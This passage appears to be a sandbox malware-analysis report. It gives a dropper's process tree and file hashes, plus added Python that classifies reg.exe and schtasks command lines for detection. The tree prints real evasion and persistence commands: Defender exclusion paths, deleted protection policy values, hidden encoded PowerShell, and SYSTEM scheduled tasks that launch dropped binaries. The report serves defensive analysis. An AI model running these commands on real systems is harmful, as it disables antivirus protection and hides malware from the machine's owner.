              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR" /t REG_DWORD /d 0 /reg:32
              - Windows security bypass
            [PID 848] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR" /t REG_DWORD /d 0 /reg:64
              - Windows security bypass
            [PID 2008] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:32
            [PID 840] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:64
              - Windows security bypass
            [PID 596] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjvgkLgoU" /t REG_DWORD /d 0 /reg:32
            [PID 1580] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjvgkLgoU" /t REG_DWORD /d 0 /reg:64
            [PID 1324] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ETlMoSXAKBfU2" /t REG_DWORD /d 0 /reg:32
            [PID 1720] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ETlMoSXAKBfU2" /t REG_DWORD /d 0 /reg:64
              - Windows security bypass
            [PID 1732] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jtlBjnUcyHUn" /t REG_DWORD /d 0 /reg:32
            [PID 1352] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jtlBjnUcyHUn" /t REG_DWORD /d 0 /reg:64
            [PID 2020] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lkHAEDYevLoxC" /t REG_DWORD /d 0 /reg:32
              - Windows security bypass
            [PID 1552] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lkHAEDYevLoxC" /t REG_DWORD /d 0 /reg:64
            [PID 1612] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOXloLrYuJMznnLuiyR" /t REG_DWORD /d 0 /reg:32
            [PID 2000] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOXloLrYuJMznnLuiyR" /t REG_DWORD /d 0 /reg:64
            [PID 876] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\EgLUknTySUlyFxVB" /t REG_DWORD /d 0 /reg:32
            [PID 1044] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\EgLUknTySUlyFxVB" /t REG_DWORD /d 0 /reg:64
            [PID 1268] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR" /t REG_DWORD /d 0 /reg:32
            [PID 1152] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR" /t REG_DWORD /d 0 /reg:64
            [PID 1680] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:32
            [PID 2008] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:64
              - Windows security bypass
        [PID 1756] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /CREATE /TN "gEdqjqhDe" /SC once /ST 10:23:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
          (the /TR payload decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
          - Creates scheduled task(s)
        [PID 1580] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /run /I /tn "gEdqjqhDe"
        [PID 532] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /DELETE /F /TN "gEdqjqhDe"
        [PID 1872] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
            [PID 1648] C:\Windows\SysWOW64\reg.exe
              cmdline: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
        [PID 848] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
            [PID 1096] C:\Windows\SysWOW64\reg.exe
              cmdline: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
        [PID 1856] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /CREATE /TN "SqCKrsanZcXdLkunv" /SC once /ST 16:09:48 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UEaXSoKYgiRfepGU\YZQeLUiYwOmUvOB\vclgNht.exe\" IW /site_id 525403 /S" /V1 /F
          - Drops file in Windows directory
          - Creates scheduled task(s)
        [PID 1896] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /run /I /tn "SqCKrsanZcXdLkunv"
    [PID 808] C:\Windows\Temp\UEaXSoKYgiRfepGU\YZQeLUiYwOmUvOB\vclgNht.exe
      cmdline: C:\Windows\Temp\UEaXSoKYgiRfepGU\YZQeLUiYwOmUvOB\vclgNht.exe IW /site_id 525403 /S
      - Executes dropped EXE
      - Checks computer location settings
      - Drops Chrome extension
      - Drops file in System32 directory
      - Drops file in Program Files directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
        [PID 1812] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /DELETE /F /TN "boqjQyEgeBagneJBps"
        [PID 1308] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
            [PID 880] C:\Windows\SysWOW64\reg.exe
              cmdline: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
        [PID 1764] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
            [PID 1988] C:\Windows\SysWOW64\reg.exe
              cmdline: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
        [PID 1788] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BjvgkLgoU\LUMjPj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eTxnbZekOUBRWtJ" /V1 /F
          - Drops file in Windows directory
          - Creates scheduled task(s)
        [PID 1588] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /CREATE /TN "eTxnbZekOUBRWtJ2" /F /xml "C:\Program Files (x86)\BjvgkLgoU\ErZeYfF.xml" /RU "SYSTEM"
          - Creates scheduled task(s)
        [PID 1492] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /END /TN "eTxnbZekOUBRWtJ"
        [PID 1288] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /DELETE /F /TN "eTxnbZekOUBRWtJ"
        [PID 2020] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /CREATE /TN "SeBSrkOEcBmbmz" /F /xml "C:\Program Files (x86)\ETlMoSXAKBfU2\JSfpubN.xml" /RU "SYSTEM"
          - Creates scheduled task(s)
        [PID 532] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /CREATE /TN "QdfrjvlIjZAGa2" /F /xml "C:\ProgramData\EgLUknTySUlyFxVB\mjGNnCv.xml" /RU "SYSTEM"
          - Creates scheduled task(s)
        [PID 848] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /CREATE /TN "KILciVuzwnfuwtlSp2" /F /xml "C:\Program Files (x86)\xOXloLrYuJMznnLuiyR\dasdwCI.xml" /RU "SYSTEM"
          - Creates scheduled task(s)
        [PID 1856] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /CREATE /TN "dsONfsHLGVeVnEqCikO2" /F /xml "C:\Program Files (x86)\lkHAEDYevLoxC\WZEqTFX.xml" /RU "SYSTEM"
          - Creates scheduled task(s)
        [PID 912] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /CREATE /TN "epwDgMxkovfKwwbuy" /SC once /ST 12:43:08 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UEaXSoKYgiRfepGU\EqKbwZba\nBSvNvX.dll\",#1 /site_id 525403" /V1 /F
          - Drops file in Windows directory
          - Creates scheduled task(s)
        [PID 1752] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /run /I /tn "epwDgMxkovfKwwbuy"
        [PID 1748] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
            [PID 1008] C:\Windows\SysWOW64\reg.exe
              cmdline: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
        [PID 732] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
            [PID 1500] C:\Windows\SysWOW64\reg.exe
              cmdline: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
        [PID 1556] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /DELETE /F /TN "SqCKrsanZcXdLkunv"
    [PID 1812] C:\Windows\system32\rundll32.EXE
      cmdline: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UEaXSoKYgiRfepGU\EqKbwZba\nBSvNvX.dll",#1 /site_id 525403
        [PID 880] C:\Windows\SysWOW64\rundll32.exe
          cmdline: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UEaXSoKYgiRfepGU\EqKbwZba\nBSvNvX.dll",#1 /site_id 525403
          - Blocklisted process makes network request
          - Checks BIOS information in registry
          - Loads dropped DLL
          - Drops file in System32 directory
          - Enumerates system info in registry
          - Modifies data under HKEY_USERS
            [PID 1232] C:\Windows\SysWOW64\schtasks.exe
              cmdline: schtasks /DELETE /F /TN "epwDgMxkovfKwwbuy"
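Every Defender change in the tree above is made twice, once with /reg:32 and once with /reg:64, so that both registry views carry it; the /reg:32 writes under the product key are the Wow6432Node entries in the signature list at the top of the report. Note also that the 32-bit wscript.exe and cmd.exe children put "C:\Windows\System32\reg.exe" on the command line while the image that actually runs is C:\Windows\SysWOW64\reg.exe, because WOW64 file-system redirection remaps System32 for 32-bit callers. The order of operations is: disable real-time monitoring by policy, add exclusion paths under both the product key (HKLM\SOFTWARE\Microsoft\Windows Defender) and the policy key (HKLM\SOFTWARE\Policies\Microsoft\Windows Defender), remove the real-time policy value again, and finally delete the Exclusions\Extensions "exe" and Spynet\SpyNetReporting policy values. The Python below is an added example, not part of the report: it parses reg.exe ADD/DELETE command lines and maps each to its effect on Defender. The sample lines are copied from this tree, plus one unrelated Run-key line, constructed here, to show that it is ignored.

```python
import re

# Constructed input: reg.exe command lines copied from the process tree above, plus one
# unrelated Run-key line (constructed, not from the report) that the classifier must ignore.
SAMPLE = [
    'REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32',
    'REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64',
    'REG ADD "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" /f /v "C:\\Windows\\Temp\\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:32',
    'REG ADD "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" /f /v "C:\\Windows\\Temp\\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:64',
    '"C:\\Windows\\System32\\reg.exe" ADD "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" /f /v "C:\\Program Files (x86)\\BjvgkLgoU" /t REG_DWORD /d 0 /reg:64',
    '"C:\\Windows\\System32\\reg.exe" ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths" /f /v "C:\\ProgramData\\EgLUknTySUlyFxVB" /t REG_DWORD /d 0 /reg:64',
    'REG DELETE "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64',
    'REG DELETE "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Extensions" /v "exe" /f /reg:64',
    'REG DELETE "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet" /v "SpyNetReporting" /f /reg:32',
    'REG ADD "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /v Updater /t REG_SZ /d "C:\\example\\u.exe" /f',
]

TOKEN = re.compile(r'"((?:\\.|[^"\\])*)"|(\S+)')   # "..." groups, \" keeps a literal quote

def tokenize(cmdline):
    return [(q or b).replace('\\"', '"') for q, b in TOKEN.findall(cmdline)]

def parse_reg(cmdline):
    """Parse `reg ADD|DELETE <key> [/v name] [/t type] [/d data] [/f] [/reg:32|64]`.
    Returns None for anything that is not a reg.exe ADD or DELETE."""
    toks = tokenize(cmdline)
    if len(toks) < 3 or toks[0].rsplit("\\", 1)[-1].lower() not in ("reg", "reg.exe"):
        return None
    op = toks[1].upper()
    if op not in ("ADD", "DELETE"):
        return None
    ev = {"op": op, "key": toks[2], "value": None, "type": None, "data": None, "view": None}
    i = 3
    while i < len(toks):
        t = toks[i].lower()
        if t in ("/v", "/t", "/d") and i + 1 < len(toks):
            ev[{"/v": "value", "/t": "type", "/d": "data"}[t]] = toks[i + 1]
            i += 1
        elif t in ("/reg:32", "/reg:64"):
            ev["view"] = t[5:]          # which registry view the write lands in on x64
        i += 1
    return ev

# Product key and policy key, with or without an explicit Wow6432Node component.
DEFENDER_KEY = re.compile(
    r"^HK(?:LM|EY_LOCAL_MACHINE)\\SOFTWARE\\(?:Wow6432Node\\)?(Policies\\)?Microsoft\\Windows Defender\\(.+)$",
    re.IGNORECASE)

def classify(ev):
    """Map a parsed reg event to its effect on Defender, or None if the key is unrelated."""
    m = DEFENDER_KEY.match(ev["key"])
    if not m:
        return None
    sub = m.group(2).lower()
    name = (ev["value"] or "").lower()
    add = ev["op"] == "ADD"
    if sub == "real-time protection" and name == "disablerealtimemonitoring":
        if add:
            return "real-time monitoring " + ("disabled" if ev["data"] == "1" else "enabled") + " by policy"
        return "real-time monitoring policy value removed (Defender default applies again)"
    if sub == "exclusions\\paths":            # value name is the path, data is REG_DWORD 0
        return ("exclusion added: path " if add else "exclusion removed: path ") + (ev["value"] or "")
    if sub == "exclusions\\extensions":
        return ("exclusion added: extension " if add else "exclusion removed: extension ") + (ev["value"] or "")
    if sub == "spynet" and name == "spynetreporting":
        return "cloud (SpyNet) reporting " + (f"set to {ev['data']}" if add else "policy value removed")
    return "other Defender setting touched: " + m.group(2)

def summarize(cmdlines):
    """Return (flagged events, number of lines that were not Defender changes)."""
    flagged, ignored = [], 0
    for line in cmdlines:
        ev = parse_reg(line)
        effect = classify(ev) if ev else None
        if effect is None:
            ignored += 1
            continue
        flagged.append({"effect": effect, "policy": bool(DEFENDER_KEY.match(ev["key"]).group(1)),
                        "view": ev["view"], "value": ev["value"], "cmdline": line})
    return flagged, ignored

def excluded_paths(flagged):
    """Paths that ended up excluded from scanning, whichever view or key they were written to."""
    return sorted({e["value"] for e in flagged if e["effect"].startswith("exclusion added: path ")})

if __name__ == "__main__":
    events, ignored = summarize(SAMPLE)
    for e in events:
        print(f"[view {e['view']}] [{'policy' if e['policy'] else 'product'}] {e['effect']}")
    print("excluded:", excluded_paths(events), "| ignored lines:", ignored)
```

The exclusion list is the part worth keeping from a run like this: every directory in it (the dropper's Temp folder, the five Program Files / ProgramData folders, C:\Windows\Temp\UEaXSoKYgiRfepGU) is where the later stages and the scheduled-task XML files are written, so those are the paths to collect and to re-scan once the exclusions are removed.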

[PID 1580] C:\Windows\system32\gpscript.exe
  cmdline: gpscript.exe /RefreshSystemParam

[PID 1324] C:\Windows\system32\gpscript.exe
  cmdline: gpscript.exe /RefreshSystemParam

[PID 1800] C:\Windows\system32\gpscript.exe
  cmdline: gpscript.exe /RefreshSystemParam
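The schtasks.exe calls in the tree fall into two patterns. The first is a one-shot launcher: a task is created with /SC once, started immediately with /run /I (so the /ST time never matters) and then deleted, which makes the command run under the Task Scheduler service instead of as a visible child of the dropper. ggmGZAWqc, gkfqRUelh and gEdqjqhDe wrap the encoded PowerShell this way as "Admin"; SqCKrsanZcXdLkunv launches vclgNht.exe and epwDgMxkovfKwwbuy launches nBSvNvX.dll through rundll32, both with /RU "SYSTEM", which is why vclgNht.exe and rundll32.EXE appear in the tree as children of taskeng.exe rather than of dfgYjxP.exe. The second pattern is persistence: eTxnbZekOUBRWtJ is created with /SC ONLOGON, then ended and deleted, while eTxnbZekOUBRWtJ2 and four further tasks are created from XML files with /RU "SYSTEM"; for those the trigger and action live inside the XML and are not visible on the command line. (The 64-bit rundll32.EXE started by the epwDgMxkovfKwwbuy task re-launches the SysWOW64 rundll32.exe, which is what rundll32 does when handed a 32-bit DLL.) The Python below is an added example, not part of the report: it parses schtasks command lines, including the \" escapes inside /TR, correlates create/run/end/delete calls by task name, and separates transient launchers from tasks that persist. The sample lines are copied from this tree in tree order.

```python
import re
from collections import defaultdict

# Constructed input: schtasks command lines copied from the process tree above, in tree
# order. ENC is the base64 blob printed in the report.
ENC = ("cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAA"
       "SABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==")
SAMPLE = [
    f'schtasks /CREATE /TN "ggmGZAWqc" /SC once /ST 03:30:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand {ENC}"',
    'schtasks /run /I /tn "ggmGZAWqc"',
    'schtasks /DELETE /F /TN "ggmGZAWqc"',
    'schtasks /CREATE /TN "SqCKrsanZcXdLkunv" /SC once /ST 16:09:48 /RU "SYSTEM" /TR "\\"C:\\Windows\\Temp\\UEaXSoKYgiRfepGU\\YZQeLUiYwOmUvOB\\vclgNht.exe\\" IW /site_id 525403 /S" /V1 /F',
    'schtasks /run /I /tn "SqCKrsanZcXdLkunv"',
    'schtasks /DELETE /F /TN "boqjQyEgeBagneJBps"',
    'schtasks /CREATE /TR "rundll32 \\"C:\\Program Files (x86)\\BjvgkLgoU\\LUMjPj.dll\\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eTxnbZekOUBRWtJ" /V1 /F',
    'schtasks /CREATE /TN "eTxnbZekOUBRWtJ2" /F /xml "C:\\Program Files (x86)\\BjvgkLgoU\\ErZeYfF.xml" /RU "SYSTEM"',
    'schtasks /END /TN "eTxnbZekOUBRWtJ"',
    'schtasks /DELETE /F /TN "eTxnbZekOUBRWtJ"',
    'schtasks /CREATE /TN "epwDgMxkovfKwwbuy" /SC once /ST 12:43:08 /RU "SYSTEM" /TR "rundll32 \\"C:\\Windows\\Temp\\UEaXSoKYgiRfepGU\\EqKbwZba\\nBSvNvX.dll\\",#1 /site_id 525403" /V1 /F',
    'schtasks /run /I /tn "epwDgMxkovfKwwbuy"',
    'schtasks /DELETE /F /TN "SqCKrsanZcXdLkunv"',
    'schtasks /DELETE /F /TN "epwDgMxkovfKwwbuy"',
]

TOKEN = re.compile(r'"((?:\\.|[^"\\])*)"|(\S+)')   # "..." groups, \" keeps a literal quote

def tokenize(cmdline):
    return [(q or b).replace('\\"', '"') for q, b in TOKEN.findall(cmdline)]

VERBS = {"/CREATE", "/RUN", "/END", "/DELETE", "/CHANGE", "/QUERY"}
WITH_VALUE = {"/TN", "/TR", "/SC", "/ST", "/SD", "/ED", "/ET", "/RU", "/RP", "/XML", "/MO",
              "/D", "/M", "/RL", "/DU", "/RI", "/EC", "/S", "/U", "/P"}

def parse_schtasks(cmdline):
    """Return (verb, {switch: value}) for a schtasks.exe call, else None. Switch names
    are case-insensitive on the real tool, so they are normalised to upper case."""
    toks = tokenize(cmdline)
    if not toks or toks[0].rsplit("\\", 1)[-1].lower() not in ("schtasks", "schtasks.exe"):
        return None
    verb, opts, i = None, {}, 1
    while i < len(toks):
        t = toks[i].upper()
        if t in VERBS:
            verb = t[1:]
        elif t in WITH_VALUE and i + 1 < len(toks):
            opts[t[1:]] = toks[i + 1]
            i += 1
        elif t.startswith("/"):
            opts[t[1:]] = True                    # bare flags such as /F, /I, /V1
        i += 1
    return verb, opts

def describe(opts):
    """Review record for a /CREATE call plus the reasons it deserves a closer look."""
    action = opts.get("TR", "")
    flags = []
    if str(opts.get("RU", "")).upper() in ("SYSTEM", "NT AUTHORITY\\SYSTEM"):
        flags.append("runs as SYSTEM")
    if "XML" in opts:
        flags.append("defined by XML file: trigger and action are not on the command line")
    if str(opts.get("SC", "")).upper() == "ONLOGON":
        flags.append("runs at every logon")
    if re.search(r"(?i)\brundll32\b.*,\s*#\d+", action):
        flags.append("rundll32 calling a DLL export by ordinal")
    if re.search(r"(?i)\\(Temp|ProgramData|AppData)\\", action):
        flags.append("action binary lives in a temp/data directory")
    if any(t.lower().startswith("-e") and "-encodedcommand".startswith(t.lower())
           for t in tokenize(action)):
        flags.append("action is encoded PowerShell")
    return {"name": opts.get("TN"), "run_as": opts.get("RU"), "schedule": opts.get("SC"),
            "action": action or opts.get("XML"), "flags": flags}

def audit(cmdlines):
    """Correlate every schtasks call by task name. A task that is created, run and
    deleted within the same tree is a one-shot launcher; one never deleted persists."""
    seen, order = defaultdict(dict), []
    for line in cmdlines:
        parsed = parse_schtasks(line)
        if not parsed or not parsed[1].get("TN"):
            continue
        verb, opts = parsed
        if opts["TN"] not in seen:
            order.append(opts["TN"])
        seen[opts["TN"]][verb] = opts
    results = []
    for name in order:
        verbs = seen[name]
        if "CREATE" not in verbs:
            continue                              # only deleted here: created before this excerpt
        rec = describe(verbs["CREATE"])
        rec["lifecycle"] = sorted(verbs)
        rec["one_shot"] = {"CREATE", "RUN", "DELETE"}.issubset(verbs)
        rec["persists"] = "DELETE" not in verbs
        results.append(rec)
    return results

if __name__ == "__main__":
    for t in audit(SAMPLE):
        kind = "one-shot" if t["one_shot"] else ("persists" if t["persists"] else "removed")
        print(f"{t['name']:<22} {kind:<9} as {t['run_as']!s:<7} {t['schedule']!s:<8} {'; '.join(t['flags'])}")
```

For the XML-defined tasks the record only carries the XML path; recovering their trigger and action means pulling those files (they are written into the excluded directories) or querying the registered task afterwards, since nothing on the command line describes what they run.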
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize 2KB
MD5 cefb2b6d5ce99c887899afd010dd0751
SHA1 a255a02a1d701c00f5d7bf8d6afbd6c86348a07c
SHA256 f60ecc2e6e5d5d6250ef64f854e93f89acd3888bceb796eb457e298bce980a4f
SHA512 df657007525d33d8737dca26b1e991d6fa68004f84b4a7bafc4ecb9c492b5013d81e83ffdd77515f3964b83b0e40596c96c68bc4bfbd2f655b19f3763660269a

Filesize 2KB
MD5 4bd5511cea2805cb2bb415ab8752e7c3
SHA1 e3b5b6990989dc02cf850c530c5d477feed89031
SHA256 595118a32ee1ddd5b7f4ac979c02c4dcdc0e0605561956702e6c6455572055a7
SHA512 4b3d0710d2437e8ed602b313cbad7038a8eada03083eba929bec9292fb21f3c8d3250e9e0b7360eafe52e934bf1912e854448dc1278bf5653911482384ce4ae8

Filesize 2KB
MD5 2baaf8c4bf02ac9c10a9b4936fc3db3f
SHA1 175f9c04d9f179080780c76ea6886f6c4da742f8
SHA256 d3e8e1d8eb552aeb2ef85243df125b4b105444128cdd268d46c3943248b33808
SHA512 76b295a5eec8d5bf7ce5ef1e96e9e4d6b671c7f345f5fca0ee8f52c24bd0e9cb7baa1e6f31963dd00ce8ef8b47a74cb8a9f7c8e624b72c996299be9a2d7c932d

Filesize 2KB
MD5 20f3b848e27a475e5719c12f548c02b7
SHA1 19de98d074ad1aa20776731b037edf5efe810348
SHA256 a8b961d65c9b42b0bfd6c44c579ef717d342ad893f143ae78a78263073258e65
SHA512 1ac549b9ae9d0b4e9a8dd8cddb073dc7f440b7cac926b4f66063feff49e3a23ec75eae2584bd4de3993ae69ef0b5f106df0bbc47bcd0ac23a8fb06b91b527b58

Filesize 6.3MB (the report lists this file 6 times)
MD5 a812e34c2f1cff6fb11fb9252863ac36
SHA1 6b8227740b7012c8e558686f139c2ebd33a19718
SHA256 890db62a47a92d70056c5e5d928cb8a177c570ea332ce605af76fe689226b5a2
SHA512 0790340d2d41bf72fc40f9b33f331555803e321200bcac6de23347e670ea8738cf015cf953251bb2ad64c6d3ea54586a266e8604d180fafd2080e2b0e1153c86

Filesize 6.9MB (the report lists this file 10 times)
MD5 e10b219de1f24b45384f99a97e52c2ac
SHA1 317f5897e99ae34928aab5144c88e8cc918e0a57
SHA256 3e673cc64b7344535d217d7e4d93bc884dc36cca6541e59d14f64b0309142f2c
SHA512 d315715fc604245f4b6f535e1aec8b0b18c6f710cf35bfe36dc3429564c7cc275405396e3915e258328bdc6f65f39ff289f61463f660fe1356a92c1e0befa22f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 5ef41697558d00884bcac909a109f90c
SHA1 93a48e0cbae704b13a2ef3dfa8cc56eea675e022
SHA256 5f67f62ed581f87d941ef9f4cd01e59bed0d4f36169298fdbfb26231957b99b7
SHA512 04607f23843d8de7a7b0392bd63440bbe3d78387a1dfd58dd5e35623768eb667f1d1c906bb552a635fcdc7c6d3ae1868ee43c4312c8d3397517ff0458897d7e4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 a4e65cf7dd8b18589072a37a83da9e25
SHA1 389f7dd9ab7f22d65b9d1eb4241e74e8187740dc
SHA256 dd1d2623218cdba4a60e0fb98d6a15b7647a76778389bcbbc627192578af46a4
